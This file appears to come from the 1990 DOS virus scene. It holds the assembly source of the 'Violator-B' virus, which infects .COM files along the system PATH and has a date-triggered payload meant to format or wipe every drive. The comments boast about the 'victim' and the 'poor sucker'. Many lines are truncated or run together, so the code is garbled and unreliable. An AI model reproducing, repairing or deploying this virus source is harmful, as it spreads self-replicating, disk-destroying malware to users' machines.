REBOOT  =       REBOOT_ - VIR_DAT       ;dISPLACEMENT TO THE 5 BYTE REBOOT CODE

     code    ends

     end     vcode


------------------------------------------------------------------------------


                  nOW HERE'S THE SOURCE FOR vIOLATOR-b


------------------------------------------------------------------------------
;
*****************************************************************************
;

;- sTRAIN b
;

;*****************************************************************************
;
; (aUG/09/90)
;

; dEVELOPMENT nOTES:
;

;  i ENCOUNTERED SEVERAL ERRORS IN THE ORIGINAL vIOLATOR CODE WHICH i

;    CORRECTED IN THIS VERSION. mAINLY, THE int 26 ROUTINE TO FUCK THE

;     DISK. iT SEEMS THAT THE ROUTINE WOULD CRASH RIGHT AFTER THE int 26

;    WAS EXECUTED AND THE WHOLE PROGRAM WOULD DIE. i HAVE SINCE FIXED

;      THIS PROBLEM IN THIS VERSION WITH AN int 13, ah 05 (fORMAT tRACK)

;     COMMAND. tHIS WOE SUBSEQUENT int 26.
;
;

;*****************************************************************************
;
;                        wRITTEN BY - tHE hIGH eVOLUTIONARY -
;
;                                rabid hEAD pROGRAMMER
;
;
;                                rEVISED BY: oNSLAUGHT
;
;                               nO AFFILIATION WITH RABiD
;
;
;               cOPYRIGHT (c) 1990 BY rabid nAT'NL dEVELOPMENT cORP.
;

;*****************************************************************************


mov_cx  macro
segment  assume ds:code,ss:code,cs:code,es:code

org     $+0100h               ; sET org TO 100h PLUS OUR OWN


vcode:  jmp     VIRUS


nop

nop

nop                              ;15 nop'S TO PLACE jmp hEADER

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop

nop


V_START EQU     $



VIRUS:
       push    cx

       mov     dx,offset
VIR_DAT

       cld

       mov     si,dx

       add     si,FIRST_3

       mov     cx,3

       mov        IT'S dos 1.0

       jnz
DOS_OK
        jmp     QUIT


DOS_OK: push    es

        mov     ah,2fh

        int     21h

        mov     [si+OLD_DTA],bx

        mov     [si+OLD_DTS],es

        pop     es

        mov     dx,DTA                  

        add     dx,si                    

        mov     ah,1ah

        int     21h                     

        push    es
        push    si

        mov     es,ds:2ch

        mov     di,0                    

        jmp     YEAR_CHECK


YEAR_CHECK:
       ah,2ah
        ;cALL dos

        cmp     cx,1990                 ;cHECK TO SEE IF THE YEAR IS 1990

        jge     MONTH_CHECK             ;iF GREATER OR EQUAL, CHECK MONTH

        jmp     FIND_PATH               ;iF NOT, GO ON WITH INFECTION


MONTH_CHECK:

        mov     ah,2ah                  ;gET DATE INFO

        int     21H                     ;cALL dos

        cmp     dh,10                   ;cHECK TO SEE IF IT IS sEPTEMBER

        jge     DAY_CHECK               ;iF GREATER O

        jmp     FIND_PATH  :-z:

        jmp     FIND_PATH               ;iF NOT, THEN GO ON WITH INFECTION


MULTIPLEX:

        mov     al,CNTR                 ;cOUNTER IS THE DRIVE TO KILL

        call    ALTER                   ;gO AND KILL THE DRIVE

                                        ;25 IS DRIVE z:

        cmp     CNTR,25                 ;iS (CNTR) 25 ?

        je      FIND_PATH               ;gO ON WITH INFECTION

        inc     CNTR                    ;aDD ONE TO (CNTR)

        loop    MULTIPLEX               ;lOOP BACK UP TO KILL EXT DRIVE


ALTER:

                                        ;rETURN UP FOR NEXT DRIVE


FIND_PATH:

        pop     si

        push    si

        add     si,ENV_STR

        lodsb

        mov     cx,offset 8000h

        repnz   scasb

        mov     cx,4


CHECK_NEXT_4:

        lodsb

        scasb

        ;

     ; tHE jnz LINE SPECIFIES THAT IF THERE IS NO path PRESENT, THEN WE WILL GO

     ; ALONG AND INFECT THE root DIRECTORY ON THE DEFAULT DRIVE.
;

        jnz     FIND_PATH               ;iF NOT PATH, THEN GO TO root DIR

        loop    CHECK_NEMORE CHARS
        pop     si                  ;lOAD IN path AGAIN TO LOOK FOR CHARS
        pop     es
        mov     [si+PATH_AD],di
        mov     di,si
        add     di,WRK_SPC              ;pUT THE FILENAME IN WRK_SPC
        mov     bx,si
        add     si,WRK_SPC
        mov     di,si
        jmp     short   SLASH_OK

SET_SUBDIR:
        cmp     word ptr [si+PATH_AD],0
        jnz     FOUND_SUBDIR
        jmp     ALL_DONE


FOUND_SUBDIR:
        push    ds
        push
  si
        mov     ds,



mov     di,si
        mov     si,es:[di+PATH_AD]
        add     di,WRK_SPC              ;di IS THE FILE NAME TO INFECT! (HEHE)


MOVE_SUBDIR:
        lodsb                           ;tO TEDIOUS WORK TO MOVE INTO SUBDIR
        cmp     al,';'                  ;dOES IT END WITH A ; CHARACHTER?
        jz      MOVED_ONE               ;IF YES, THEN WE FOUND A SUBDIR
        cmp     al,0                    ;IS IT THE END OF THE PATH?
        jz      MOVED_LAST_ONE          ;IF YES, THEN WE SAVE THE path
       



 stosb                           ;MARKER INTO di FOR FUTURE REFERENCE
        jmp     short   MOVE_SUBDIR

MOVED_LAST_ONE:
        mov     si,0

MOVED_ONE:
        pop     bx                      ;bx IS WHERE THE VIRUS DATA IS
        pop     ds                      ;rESTORE ds SO THAT WE CAN DO STUPH
        mov     [bx+PATH_AD],si         ;wHERE IS THE NEXT SUBDIR?
        nop
        cmp     ch,'\'                  ;cHECK TO SEE IF IT ENDS IN \
        jz      SLASH_OK                ;iF YES, THEN IT'S o



k
        mov     al,'\'                  ;IF NOT, THEN ADD ONE...
        stosb                           ;STORE THE SUCKER


SLASH_OK:
        mov     [bx+NAM_PTR],di         ;mOVE THE FILENAME INTO WORKSPACE
        mov     si,bx                   ;rESTORE THE ORIGINAL si VALUE
        add     si,F_SPEC               ;pOINT TO com FILE VICTIM
        mov     cx,6
        repz    movsb                   ;mOVE VICTIM INTO WORKSPACE
        mov     si,bx
        mov     ah,4eh
        mov     dx,WRK_SPC
        add     dx,si     



              ;dx IS ... the victim!!!
        mov     cx,3                    ;aTTRIBUTES OF rEAD oNLY OR hIDDEN ok
        int     21h
        jmp     short   FIND_FIRST

FIND_NEXT:
        mov     ah,4fh
        int     21h

FIND_FIRST:
        jnb     FOUND_FILE              ;jUMP IF WE FOUND IT
        jmp     short   SET_SUBDIR      ;oTHERWISE, GET ANOTHER SUBDIRECTORY

FOUND_FILE:
        mov     ax,[si+DTA_TIM]         ;gET TIME FROM dta
        and     al,1eh                  ;mASK TO REMOVE ALL BU



T SECONDS
        cmp     al,1eh                  ;60 SECONDS
        jz      FIND_NEXT
        cmp     word ptr [si+DTA_LEN],offset 0fa00h ;iS THE FILE TOO LONG?
        ja      FIND_NEXT               ;iF TOO LONG, FIND ANOTHER ONE
        cmp     word ptr [si+DTA_LEN],0ah ;iS IT TOO SHORT?
        jb      FIND_NEXT               ;tHEN GO FIND ANOTHER ONE
        mov     di,[si+NAM_PTR]
        push    si
        add     si,DTA_NAM

MORE_CHARS:
        lodsb
        stosb
        cmp     al,0
        jnz 



    MORE_CHARS
        pop     si
        mov     ax,offset 4300h
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        mov     [si+OLD_ATT],cx
        mov     ax,offset 4301h
        and     cx,offset 0fffeh
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        mov     ax,offset 3d02h
        mov     dx,WRK_SPC
        add     dx,si
        int     21h
        jnb     OPENED_OK
        jmp     FIX_ATTR

OPENED_OK:
        mov     bx,ax
        mov     ax,offset



 5700h
        int     21h
        mov     [si+OLD_TIM],cx         ;sAVE FILE TIME
        mov     [si+OL_DATE],dx         ;sAVE THE DATE
        mov     ah,2ch
        int     21h
        and     dh,7
        jmp     INFECT

INFECT:
        mov     ah,3fh
        mov     cx,3
        mov     dx,FIRST_3
        add     dx,si
        int     21h             ;sAVE FIRST 3 BYTES INTO THE DATA AREA
        jb      FIX_TIME_STAMP
        cmp     ax,3
        jnz     FIX_TIME_STAMP
        mov     ax,offset 4202h




        mov     cx,0
        mov     dx,0
        int     21h
        jb      FIX_TIME_STAMP
        mov     cx,ax
        sub     ax,3
        mov     [si+JMP_DSP],ax
        add     cx,offset C_LEN_Y
        mov     di,si
        sub     di,offset C_LEN_X

        mov     [di],cx
        mov     ah,40h
        mov_cx  VIRLEN
        mov     dx,si
        sub     dx,offset CODELEN
        int     21h
        jb      FIX_TIME_STAMP
        cmp     ax,offset VIRLEN
        jnz     FIX_TIME_STAMP
        mov



     ax,offset 4200h
        mov     cx,0
        mov     dx,0
        int     21h
        jb      FIX_TIME_STAMP
        mov     ah,40h
        mov     cx,3
        mov     dx,si
        add     dx,JMP_OP
        int     21h

FIX_TIME_STAMP:
        mov     dx,[si+OL_DATE]
        mov     cx,[si+OLD_TIM]
        and     cx,offset 0ffe0h
        or      cx,1eh
        mov     ax,offset 5701h
        int     21h
        mov     ah,3eh
        int     21h

FIX_ATTR:
        mov     ax,offset 4301h
        mov



     cx,[si+OLD_ATT]
        mov     dx,WRK_SPC
        add     dx,si
        int     21h

ALL_DONE:
        push    ds
        mov     ah,1ah
        mov     dx,[si+OLD_DTA]
        mov     ds,[si+OLD_DTS]
        int     21h
        pop     ds

QUIT:
        pop     cx
        xor     ax,ax                   ;xor VALUES SO THAT WE WILL GIVE THE
        xor     bx,bx                   ;POOR SUCKER A HARD TIME TRYING TO
        xor     dx,dx                   ;REASSEMBLE THE SOURCE CODE IF HE
        xor     si,si                   ;DECIDES TO DISSASSEMBLE US.
        m



ov     di,offset 0100h
        push    di
        xor     di,di
        ret     0ffffh                  ;rETURN BACK TO THE BEGINNING
                                        ;OF THE PROGRAM

VIR_DAT equ     $

INTRO   DB      '.d$^I*&b)_A.%r',13,10
OLDDTA_ dw      0
OLDDTS_ dw      0
OLDTIM_ dw      0
COUNT_  dw      0
CNTR    db      2                               ; dRIVE TO NUKE FROM (c:+++)
OLDATE_ dw      0
OLDATT_ dw      0
FIRST3_ equ     $
        int     20h
        nop
JMPOP_  db      0e9h
JMPDSP_ dw      0
FSPEC_  db      '*.com',0
PATHAD_ dw      0
NAMPTR_ dw      0
ENVSTR_ db      'path='




WRKSPC_ db      40H DUP (0)
DTA_    db      16H DUP (0)
DTATIM_ dw      0,0
DTALEN_ dw      0,0
DTANAM_ db      0dH DUP (0)
LST_BYT equ     $
VIRLEN  =       LST_BYT - V_START
CODELEN =       VIR_DAT - V_START
C_LEN_X =       VIR_DAT - V_START - 2
C_LEN_Y =       VIR_DAT - V_START + 100h
OLD_DTA =       OLDDTA_ - VIR_DAT
OLD_DTS =       OLDDTS_ - VIR_DAT
OLD_TIM =       OLDTIM_ - VIR_DAT
OL_DATE =       OLDATE_ - VIR_DAT
OLD_ATT =       OLDATT_ - VIR_DAT
FIRST_3 =       FIRST3_ - VIR_DAT
JMP_OP  =       JM



POP_  - VIR_DAT
JMP_DSP =       JMPDSP_ - VIR_DAT
F_SPEC  =       FSPEC_  - VIR_DAT
PATH_AD =       PATHAD_ - VIR_DAT
NAM_PTR =       NAMPTR_ - VIR_DAT
ENV_STR =       ENVSTR_ - VIR_DAT
WRK_SPC =       WRKSPC_ - VIR_DAT
DTA     =       DTA_    - VIR_DAT
DTA_TIM =       DTATIM_ - VIR_DAT
DTA_LEN =       DTALEN_ - VIR_DAT
DTA_NAM =       DTANAM_ - VIR_DAT
COUNT   =       COUNT_  - VIR_DAT

        code    ends
end     vcode

------------------------------------------------------------------------------
             



                                                           hr
                        aNOTHER QUALITY FILE FROM

                    
                   
                                     
                         
                                 
               
                
                                                        
                                                                
                 



                                                    
                                                             


ZDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDBDDDDDDDDDD
                                  
                                           
             
                          
               
DDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDDADDDDDDDDDDY














